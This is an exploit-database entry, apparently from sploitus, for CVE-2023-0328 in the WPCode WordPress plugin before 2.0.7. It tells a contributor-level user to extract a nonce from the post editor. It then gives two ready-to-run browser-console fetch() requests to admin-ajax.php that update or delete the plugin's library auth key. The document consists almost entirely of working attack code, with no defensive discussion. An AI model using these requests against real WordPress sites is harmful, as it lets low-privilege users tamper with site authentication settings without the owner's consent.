Exploit for WPCode < 2.0.7 - Contributor+ WPCode Library Auth Key Update/Deletion CVE-2023-0328

Name: Exploit for WPCode < 2.0.7 - Contributor+ WPCode Library Auth Key Update/Deletion CVE-2023-0328
Rating: 5 (62 reviews)

2023-02-09 | CVSS 4.0

## https://sploitus.com/exploit?id=WPEX-ID:3C4318A9-A3C5-409B-A52E-EDD8583C3C43
As a contributor, edit a post and extract the nonce from the "var wpcode =" JS code, then run the below command in the developer console of the web browser

To update the auth key:

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wpcode_library_store_auth&_ajax_nonce=NONCE&key=AAAAAA&username=dummy&origin=https://library.wpcode.com',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

To delete the auth key

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wpcode_library_delete_auth&_ajax_nonce=NONCE',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));